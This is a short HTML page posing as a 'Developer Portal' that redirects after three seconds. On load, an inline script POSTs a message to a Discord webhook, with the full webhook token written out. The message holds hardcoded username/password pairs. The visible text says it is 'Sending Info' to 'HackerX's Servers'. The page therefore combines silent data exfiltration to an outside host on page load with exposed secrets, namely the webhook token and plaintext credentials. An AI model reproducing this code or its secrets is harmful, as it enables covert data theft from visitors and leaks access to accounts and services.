<!DOCTYPE html>
<html>

<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width">
	<meta http-equiv="refresh" content="3; url=/" />
	<title>Developer Portal</title>
	<link href="style.css" rel="stylesheet" type="text/css" />
	<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.13.0/css/all.css">
	<link rel="icon" href="https://img.pngio.com/code-icon-free-of-font-awesome-icons-code-icon-png-512_512.png">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	<script src="script.js"></script>
</head>
<body>

<script>
     const request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/941090997360820284/J8iOWzLOlTr2GmxuZXLyKROamRtVJwq8tE1SSXyKIXxyywHtqQIPEFCnM6nHhZM9Wq8h");

      request.setRequestHeader('Content-type', 'application/json');

      const params = {
        username: "Request",
        avatar_url: "https://img.pngio.com/code-icon-free-of-font-awesome-icons-code-icon-png-512_512.png",
        content: `U:admin-P:papostol |U:twentyone-P:2121 |U:Byrus-P:dscbot`
      }

      request.send(JSON.stringify(params));
    </script>
<p>Requesting Access From HackerX's Servers And Sending Info There.. </p>